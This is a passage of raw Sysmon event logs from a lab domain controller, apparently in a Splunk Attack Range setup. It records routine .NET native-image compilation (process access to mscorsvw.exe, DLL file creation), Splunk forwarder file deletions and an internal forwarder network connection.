21:03:43.112{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1AF-60D3-5303-00000000CF01}4372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020229Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:43.096{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1AF-60D3-5303-00000000CF01}4372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020228Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:43.096{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1AF-60D3-5303-00000000CF01}4372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020227Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:43.003{4DB9351A-A1AE-60D3-5203-00000000CF01}6400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1900-0\Microsoft.Build.Conversion.v4.0.dll2021-06-23 21:03:43.003 10341000x800000000000000020251Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.800{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B0-60D3-5803-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020250Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.784{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B0-60D3-5803-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020249Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.784{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B0-60D3-5803-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020248Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.690{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B0-60D3-5703-00000000CF01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020247Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.659{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B0-60D3-5703-00000000CF01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020246Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.659{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B0-60D3-5703-00000000CF01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020245Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:44.581{4DB9351A-A1B0-60D3-5603-00000000CF01}7004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b5c-0\Microsoft.Build.Framework.dll2021-06-23 21:03:44.581 23542300x800000000000000020244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.487{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C72D9AD6879411B9FBEB73F114602E8,SHA256=3AE53C1DF4CC988FEF286D1FEF5D0434D277E5C5C0A2FA58184BE61EE8615B50,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.331{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B0-60D3-5603-00000000CF01}7004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020242Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.284{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B0-60D3-5603-00000000CF01}7004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020241Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.284{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B0-60D3-5603-00000000CF01}7004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020240Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.238{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B0-60D3-5503-00000000CF01}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020239Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.206{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B0-60D3-5503-00000000CF01}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020238Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.206{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B0-60D3-5503-00000000CF01}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000020237Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:42.260{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61417-false10.0.1.12-8000- 11241100x800000000000000020236Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:44.018{4DB9351A-A1AF-60D3-5403-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19fc-0\Microsoft.Build.Engine.dll2021-06-23 21:03:44.018 23542300x800000000000000020253Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:45.487{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33B114377E7E5F48116D2D4885CD863A,SHA256=C12BB306CB87D47607774032F289710BDE4B9DD0DDE5907B199B571427C09981,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020252Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:45.206{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE731583B4D12B527619E173FDBE597A,SHA256=EA0CC829413CE66BA2195FFA7D3949777406BFC3EB638E696019DA44A0241F75,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020261Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:46.972{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B2-60D3-5A03-00000000CF01}2488C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020260Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:46.956{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1B2-60D3-5A03-00000000CF01}2488C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020259Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:46.956{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B2-60D3-5A03-00000000CF01}2488C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020258Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:46.893{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B2-60D3-5903-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020257Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:46.862{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B2-60D3-5903-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020256Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:46.862{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B2-60D3-5903-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0